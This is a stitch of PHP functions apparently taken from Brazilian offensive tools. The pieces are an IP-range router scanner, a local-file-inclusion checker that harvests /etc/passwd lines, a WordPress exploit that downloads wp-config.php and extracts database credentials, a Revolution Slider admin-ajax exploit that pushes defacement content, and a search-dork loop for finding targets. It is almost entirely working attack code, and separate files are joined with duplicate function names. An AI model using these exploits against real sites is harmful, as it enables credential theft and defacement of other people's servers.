function main($config, $rest) { __plus(); print "[ " . date("h:m:s") . " ] [!][EXPLOITATION THE FILE]:{$config['file']}\n"; preg_match_all("(root:.*)", $rest['corpo'], $final); preg_match_all("(sbin:.*)", $rest['corpo'], $final__); preg_match_all("(ftp:.*)", $rest['corpo'], $final___); preg_match_all("(nobody:.*)", $rest['corpo'], $final____); preg_match_all("(mail:.*)", $rest['corpo'], $final_____); $_final = array_merge($final[0], $final__[0], $final___[0], $final____[0], $final_____[0]); $res = NULL; if (preg_match("#root#i", $rest['corpo'])) { $res .= "[ " . date("h:m:s") . " ] [+][IS VULN][RESUME][VALUES]:\n"; $res .= $config['line'] . "\n"; foreach ($_final as $value) { $res .= "[ " . date("h:m:s") . " ] [VALUE]: {$value}\n"; } $res .= $config['line']; __plus(); file_put_contents('lfi.txt', "{$config['alvo']}\n{$res}\n", FILE_APPEND); print "{$res}[VALUES SAVED]: lfi.txt\n\n"; exit; } else { print "[ " . date("h:m:s") . " ] [x][NOT VULN]\n"; } }
function main($params) { //IMPLEMENTATION HOME echo __banner("{$_SESSION["c13"]}{$params['line']}{$_SESSION["c00"]}", 1); echo "{$_SESSION["c01"]}Starting SCANNER RouterHunterBR 1.0 at [" . date("d-m-Y H:i:s") . "]{$_SESSION["c09"]}\n[!] legal disclaimer: Usage of RouterHunterBR for attacking targets without prior mutual consent is illegal. \nIt is the end user's responsibility to obey all applicable local, state and federal laws.\nDevelopers assume no liability and are not responsible for any misuse or damage caused by this program{$_SESSION["c00"]}\n\n"; if ($params['op'] == 0) { //WORKING WITH IPS ON TRACK for ($i = $params['range'][0][0]; $i < $params['range'][0][1]; $i++) { __plus(); __subProcess($params, "{$i}.{$params['range'][1][0]}.{$params['range'][2][0]}.{$params['range'][3][0]}"); __plus(); } for ($i = $params['range'][1][0]; $i < $params['range'][1][1]; $i++) { __plus(); __subProcess($params, "{$params['range'][0][0]}.{$i}.{$params['range'][2][0]}.{$params['range'][3][0]}"); __plus(); } for ($i = $params['range'][2][0]; $i < $params['range'][2][1]; $i++) { __plus(); __subProcess($params, "{$params['range'][0][0]}.{$params['range'][1][0]}.{$i}.{$params['range'][3][0]}"); __plus(); } for ($i = $params['range'][3][0]; $i < $params['range'][3][1]; $i++) { __plus(); __subProcess($params, "{$params['range'][0][0]}.{$params['range'][1][0]}.{$params['range'][2][0]}.{$i}"); __plus(); } } elseif ($params['op'] == 1) { //WORKING WITH IP RANDOM !not_isnull_empty($params['limit-ip']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SET NUMBER OF IPS\n{$_SESSION["c00"]}") : NULL; for ($i = 0; $i <= $params['limit-ip']; $i++) { __subProcess($params, __getIPRandom()); __plus(); } } elseif ($params['op'] == 2) { //IP WORK SOURCE FILE !is_array($params['file']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SOMETHING WRONG WITH YOUR FILE\n{$_SESSION["c00"]}") : NULL; __plus(); foreach ($params['file'] as $value) { __subProcess($params, $value); __plus(); } } }
function __request($url, $plugin) { $objcurl = curl_init(); $caminho = NULL; $status = array(); curl_setopt($objcurl, CURLOPT_URL, $url . $plugin); curl_setopt($objcurl, CURLOPT_HEADER, 1); curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($objcurl, CURLOPT_USERAGENT, "::INURLBR::/1.0.1 (compatible; MSIE 5.01; Linux 5.0)"); curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 20); curl_setopt($objcurl, CURLOPT_TIMEOUT, 10); $corpo = curl_exec($objcurl); if (preg_match_all("(<b>/.*./wp-content/)", $corpo, $caminho)) { return __request($url, "{$plugin}&file=" . str_replace('wp-content/', '', $caminho[0][0]) . "wp-config.php"); } __plus(); if (preg_match("#DB_NAME#i", $corpo) || preg_match("#root:#i", $corpo) || preg_match("#readfile(#i", $corpo)) { //----------------------------------------------------------------------------- preg_match_all("(DB_NAME.*')", $corpo, $status['DB_NAME']); preg_match_all("(DB_USER.*')", $corpo, $status['DB_USER']); preg_match_all("(DB_PASSWORD.*')", $corpo, $status['DB_PASSWORD']); preg_match_all("(DB_HOST.*')", $corpo, $status['DB_HOST']); preg_match_all("(DB_CHARSET.*')", $corpo, $status['DB_CHARSET']); #FILE PASSWORD preg_match_all("(root:.*)", $corpo, $status['pwd1']); preg_match_all("(sbin:.*)", $corpo, $status['pwd2']); preg_match_all("(ftp:.*)", $corpo, $status['pwd3']); preg_match_all("(nobody:.*)", $corpo, $status['pwd4']); preg_match_all("(mail:.*)", $corpo, $status['pwd5']); //----------------------------------------------------------------------------- __plus(); $res = "\n------------------------------------------------------------------------------------------------------------------\n[0;32m0x " . date("h:m:s") . " [INFO][VULN]:: [1;37m [ " . date("d-m-Y H:i:s") . " ]\n"; $res .= "[0;32m0x " . date("h:m:s") . " [INFO][VULN][DB]::[1;37m " . $status['DB_NAME'][0][0]; $res .= "::" . $status['DB_USER'][0][0]; $res .= "::" . $status['DB_PASSWORD'][0][0]; $res .= "::" . $status['DB_HOST'][0][0]; $res .= "::" . $status['DB_CHARSET'][0][0]; $res .= preg_match("#root#i", $corpo) ? "\n[0;32m0x " . date("h:m:s") . "[INFO][VULN][FILE_PASSWORD]::[1;37m{$status['pwd1'][0][0]} - {$status['pwd2'][0][0]} - {$status['pwd3'][0][0]} - {$status['pwd4'][0][0]} - {$status['pwd5'][0][0]}[0m" : NULL; $res .= "\n[0;32m0x " . date("h:m:s") . " [INFO][VULN][URL]::[1;37m{$url}{$plugin}[0m"; $res .= "\n------------------------------------------------------------------------------------------------------------------\n[0m"; print $res; $res = str_replace('[1;37m', '', str_replace('[0m', '', str_replace('[0;32m', '', $res))); file_put_contents('WORDPRESS_A_F_D.txt', "{$res}\n", FILE_APPEND); __plus(); } else { print "\n[1;31m0x " . date("h:m:s") . " [INFO][NOT VULN]::[1;37m {$url}{$plugin} \n[0m"; } curl_close($objcurl); __plus(); }
function __request($__) { $curlxpl = curl_init(); curl_setopt($curlxpl, CURLOPT_URL, "{$__['target']}/wp-admin/admin-ajax.php"); !is_null($__['proxy']) ? curl_setopt($curlxpl, CURLOPT_PROXY, $__['proxy']) : NULL; curl_setopt($curlxpl, CURLOPT_USERAGENT, __setUserAgentRandom()); curl_setopt($curlxpl, CURLOPT_POST, 1); curl_setopt($curlxpl, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action", "client_action" => "update_captions_css", "data" => $__['deface'])); curl_setopt($curlxpl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curlxpl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curlxpl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curlxpl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curlxpl, CURLOPT_COOKIEFILE, 'cookie.log'); curl_setopt($curlxpl, CURLOPT_COOKIEJAR, 'cookie.log'); $result = curl_exec($curlxpl) . __plus(); if (eregi('true', $result)) { $h = "{$__['target']}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css"; echo "[!] [INFO] Success Exploit!\n"; echo "[!] [INFO] URL FILE MODIFIED: {$h}\n{$__['line']}\n"; __plus(); file_put_contents("revslider.txt", "{$h}\n\n", FILE_APPEND); } else { echo "[!] [FAIL] {$__['target']} : nothing changed \n{$__['line']}\n"; } curl_close($curlxpl); unset($curlxpl); }
function __main($dork, $motor, $cod) { $dork_[0] = strstr($dork, '[DORK]') ? explode('[DORK]', $dork) : array($dork); $dork_[1] = not_isnull_empty($_SESSION['config']['dork-file']) ? __openFile($_SESSION['config']['dork-file'], 1) : $dork_[0]; $dork_[2] = not_isnull_empty($_SESSION['config']['dork-rand']) ? __randomDork($_SESSION['config']['dork-rand']) : array(); $dork_[3] = array_filter(array_unique(array_merge($dork_[0], $dork_[1], $dork_[2]))); $file_proxy = not_isnull_empty($_SESSION['config']['proxy-file']) ? __openFile($_SESSION['config']['proxy-file'], 1) : NULL; $list_proxy = is_array($file_proxy) ? $file_proxy : NULL; print __bannerLogo(); __startingBanner(); for ($i = 0; $i <= count($dork_[3]); $i++) { if (!empty($dork_[3][$i])) { echo "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}[ DORK ]::{$_SESSION["c1"]}[ {$dork_[3][$i]} ]\n"; //$objNewSearch = create_function('$dork_, $motor, $list_proxy', $cod); //$objNewSearch(urlencode($dork_[3][$i]), $motor, $list_proxy); __engines(urlencode($dork_[3][$i]), $list_proxy) . __plus(); $_SESSION["config"]["pr"] ? __process(explode("\n", $_SESSION["config"]["totas_urls"])) . __plus() : NULL; $_SESSION["config"]["pr"] ? $_SESSION["config"]["totas_urls"] = NULL : NULL; echo "\n"; } } !$_SESSION["config"]["pr"] ? __process(explode("\n", $_SESSION["config"]["totas_urls"])) . __plus() : NULL; __exitProcess(); }